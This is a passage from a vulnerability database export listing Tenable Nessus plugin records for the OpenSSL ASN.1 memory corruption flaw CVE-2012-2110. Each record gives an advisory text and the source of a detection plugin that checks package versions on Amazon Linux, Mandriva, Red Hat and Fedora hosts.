script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"openssl-1.0.0i-1.41.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-debuginfo-1.0.0i-1.41.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-devel-1.0.0i-1.41.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-perl-1.0.0i-1.41.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-static-1.0.0i-1.41.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-debuginfo / openssl-devel / openssl-perl / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:39:33", "description": "According to its banner, the remote web server is running a version of OpenSSL 1.0.0 is earlier than 1.0.0i. As such, the OpenSSL library itself is reportedly affected by a memory corruption vulnerability via an integer truncation error in the function 'asn1_d2i_read_bio' when reading ASN.1 DER format data. \n\nApplications using the 'BIO' or 'FILE' based functions (i.e., 'd2i_*_bio' or 'd2i_*_fp' functions) are affected by this issue.\nAlso affected are 'S/MIME' or 'CMS' applications using 'SMIME_read_PKCS7' or 'SMIME_read_CMS' parsers. The OpenSSL command line utility is affected if used to handle untrusted DER formatted data.\n\nNote that the SSL/TLS code of OpenSSL is not affected. Also not affected are applications using memory-based ASN.1 functions (e.g., 'd2i_X509', 'd2i_PKCS12', etc.) nor are applications using only PEM functions.", "cvss3": {}, "published": "2012-04-19T00:00:00", "type": "nessus", "title": "OpenSSL 1.0.0 < 1.0.0i ASN.1 asn1_d2i_read_bio Memory Corruption", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2023-08-21T00:00:00", "cpe": ["cpe:/a:openssl:openssl"], "id": "OPENSSL_1_0_0I.NASL", "href": "https://www.tenable.com/plugins/nessus/58800", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58800);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/08/21\");\n\n script_cve_id(\"CVE-2012-2110\");\n script_bugtraq_id(53158);\n script_xref(name:\"EDB-ID\", value:\"18756\");\n\n script_name(english:\"OpenSSL 1.0.0 < 1.0.0i ASN.1 asn1_d2i_read_bio Memory Corruption\");\n script_summary(english:\"Does a banner check.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote host may be affected by a memory corruption vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its banner, the remote web server is running a version\nof OpenSSL 1.0.0 is earlier than 1.0.0i. As such, the OpenSSL library\nitself is reportedly affected by a memory corruption vulnerability via\nan integer truncation error in the function 'asn1_d2i_read_bio' when\nreading ASN.1 DER format data. \n\nApplications using the 'BIO' or 'FILE' based functions (i.e., \n'd2i_*_bio' or 'd2i_*_fp' functions) are affected by this issue.\nAlso affected are 'S/MIME' or 'CMS' applications using\n'SMIME_read_PKCS7' or 'SMIME_read_CMS' parsers. The OpenSSL command\nline utility is affected if used to handle untrusted DER formatted\ndata.\n\nNote that the SSL/TLS code of OpenSSL is not affected. Also not\naffected are applications using memory-based ASN.1 functions (e.g.,\n'd2i_X509', 'd2i_PKCS12', etc.) nor are applications using only PEM\nfunctions.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20120419.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/changelog.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2012/Apr/210\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to OpenSSL 1.0.0i or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-2110\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:openssl:openssl\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2023 Tenable Network Security, Inc.\");\n\n script_dependencies(\"openssl_version.nasl\", \"openssl_nix_installed.nbin\", \"openssl_win_installed.nbin\");\n script_require_keys(\"installed_sw/OpenSSL\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras_openssl.inc');\n\nvar app_info = vcf::combined_get_app_info(app:'OpenSSL');\n\nvcf::check_all_backporting(app_info:app_info);\n\nvar constraints = [{ 'min_version' : \"1.0.0\", 'fixed_version' : '1.0.0i'}];\n\nvcf::openssl::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:40:15", "description": "A potentially exploitable vulnerability has been discovered in the OpenSSL function asn1_d2i_read_bio that affects S/MIME or CMS applications using the built in MIME parser SMIME_read_PKCS7 or SMIME_read_CMS (CVE-2012-2110).\n\nThe updated packages have been patched to correct this issue.", "cvss3": {}, "published": "2012-04-20T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : openssl (MDVSA-2012:060)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64openssl0.9.8", "p-cpe:/a:mandriva:linux:lib64openssl1.0.0", "p-cpe:/a:mandriva:linux:lib64openssl1.0.0-devel", "p-cpe:/a:mandriva:linux:lib64openssl-devel", "p-cpe:/a:mandriva:linux:lib64openssl-engines1.0.0", "p-cpe:/a:mandriva:linux:lib64openssl-static-devel", "p-cpe:/a:mandriva:linux:lib64openssl1.0.0-static-devel", "p-cpe:/a:mandriva:linux:libopenssl-devel", "p-cpe:/a:mandriva:linux:libopenssl-engines1.0.0", "p-cpe:/a:mandriva:linux:libopenssl-static-devel", "p-cpe:/a:mandriva:linux:libopenssl0.9.8", "p-cpe:/a:mandriva:linux:libopenssl1.0.0", "p-cpe:/a:mandriva:linux:libopenssl1.0.0-devel", "p-cpe:/a:mandriva:linux:libopenssl1.0.0-static-devel", "p-cpe:/a:mandriva:linux:openssl", "cpe:/o:mandriva:linux:2010.1", "cpe:/o:mandriva:linux:2011"], "id": "MANDRIVA_MDVSA-2012-060.NASL", "href": "https://www.tenable.com/plugins/nessus/58806", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2012:060. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58806);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-2110\");\n script_bugtraq_id(53158);\n script_xref(name:\"MDVSA\", value:\"2012:060\");\n\n script_name(english:\"Mandriva Linux Security Advisory : openssl (MDVSA-2012:060)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A potentially exploitable vulnerability has been discovered in the\nOpenSSL function asn1_d2i_read_bio that affects S/MIME or CMS\napplications using the built in MIME parser SMIME_read_PKCS7 or\nSMIME_read_CMS (CVE-2012-2110).\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openssl.org/news/secadv/20120419.txt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl-engines1.0.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl0.9.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl1.0.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl1.0.0-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl1.0.0-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl-engines1.0.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0.9.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl1.0.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl1.0.0-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl1.0.0-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2011\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64openssl-engines1.0.0-1.0.0a-1.12mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64openssl0.9.8-0.9.8v-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64openssl1.0.0-1.0.0a-1.12mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64openssl1.0.0-devel-1.0.0a-1.12mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64openssl1.0.0-static-devel-1.0.0a-1.12mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libopenssl-engines1.0.0-1.0.0a-1.12mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libopenssl0.9.8-0.9.8v-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libopenssl1.0.0-1.0.0a-1.12mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libopenssl1.0.0-devel-1.0.0a-1.12mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libopenssl1.0.0-static-devel-1.0.0a-1.12mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"openssl-1.0.0a-1.12mdv2010.2\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64openssl-devel-1.0.0d-2.5-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64openssl-engines1.0.0-1.0.0d-2.5-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64openssl-static-devel-1.0.0d-2.5-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"x86_64\", reference:\"lib64openssl1.0.0-1.0.0d-2.5-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libopenssl-devel-1.0.0d-2.5-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libopenssl-engines1.0.0-1.0.0d-2.5-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libopenssl-static-devel-1.0.0d-2.5-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", cpu:\"i386\", reference:\"libopenssl1.0.0-1.0.0d-2.5-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"openssl-1.0.0d-2.5-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:39:40", "description": "Updated openssl, openssl097a, and openssl098e packages that fix one security issue are now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library.\n\nMultiple numeric conversion errors, leading to a buffer overflow, were found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data from BIO (OpenSSL's I/O abstraction) inputs. Specially crafted DER (Distinguished Encoding Rules) encoded data read from a file or other BIO input could cause an application using the OpenSSL library to crash or, potentially, execute arbitrary code. (CVE-2012-2110)\n\nAll OpenSSL users should upgrade to these updated packages, which contain a backported patch to resolve this issue. For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.", "cvss3": {}, "published": "2012-04-25T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : openssl (RHSA-2012:0518)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:openssl", "p-cpe:/a:redhat:enterprise_linux:openssl-debuginfo", "p-cpe:/a:redhat:enterprise_linux:openssl-devel", "p-cpe:/a:redhat:enterprise_linux:openssl-perl", "p-cpe:/a:redhat:enterprise_linux:openssl-static", "p-cpe:/a:redhat:enterprise_linux:openssl097a", "p-cpe:/a:redhat:enterprise_linux:openssl098e", "p-cpe:/a:redhat:enterprise_linux:openssl098e-debuginfo", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.2"], "id": "REDHAT-RHSA-2012-0518.NASL", "href": "https://www.tenable.com/plugins/nessus/58869", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0518. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58869);\n script_version(\"1.30\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-2110\");\n script_bugtraq_id(53158);\n script_xref(name:\"RHSA\", value:\"2012:0518\");\n\n script_name(english:\"RHEL 5 / 6 : openssl (RHSA-2012:0518)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openssl, openssl097a, and openssl098e packages that fix one\nsecurity issue are now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nMultiple numeric conversion errors, leading to a buffer overflow, were\nfound in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One)\ndata from BIO (OpenSSL's I/O abstraction) inputs. Specially crafted\nDER (Distinguished Encoding Rules) encoded data read from a file or\nother BIO input could cause an application using the OpenSSL library\nto crash or, potentially, execute arbitrary code. (CVE-2012-2110)\n\nAll OpenSSL users should upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. For the update to\ntake effect, all services linked to the OpenSSL library must be\nrestarted, or the system rebooted.\"\n );\n # http://www.openssl.org/news/secadv/20120419.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openssl.org/news/secadv/20120419.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0518\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2110\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl097a\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl098e\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl098e-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0518\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"openssl-0.9.8e-22.el5_8.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"openssl-devel-0.9.8e-22.el5_8.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openssl-perl-0.9.8e-22.el5_8.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"openssl-perl-0.9.8e-22.el5_8.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openssl-perl-0.9.8e-22.el5_8.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"openssl097a-0.9.7a-11.el5_8.2\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"openssl-1.0.0-20.el6_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"openssl-debuginfo-1.0.0-20.el6_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"openssl-devel-1.0.0-20.el6_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openssl-perl-1.0.0-20.el6_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openssl-perl-1.0.0-20.el6_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssl-perl-1.0.0-20.el6_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openssl-static-1.0.0-20.el6_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openssl-static-1.0.0-20.el6_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssl-static-1.0.0-20.el6_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"openssl098e-0.9.8e-17.el6_2.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"openssl098e-debuginfo-0.9.8e-17.el6_2.2\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-debuginfo / openssl-devel / openssl-perl / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:39:02", "description": "Upstream security update fixing CVE-2012-2110 - memory corruption in when reading ASN.1 structures through BIO interface.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2012-04-27T00:00:00", "type": "nessus", "title": "Fedora 17 : openssl-1.0.0i-1.fc17 (2012-6343)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:openssl", "cpe:/o:fedoraproject:fedora:17"], "id": "FEDORA_2012-6343.NASL", "href": "https://www.tenable.com/plugins/nessus/58888", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-6343.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58888);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", 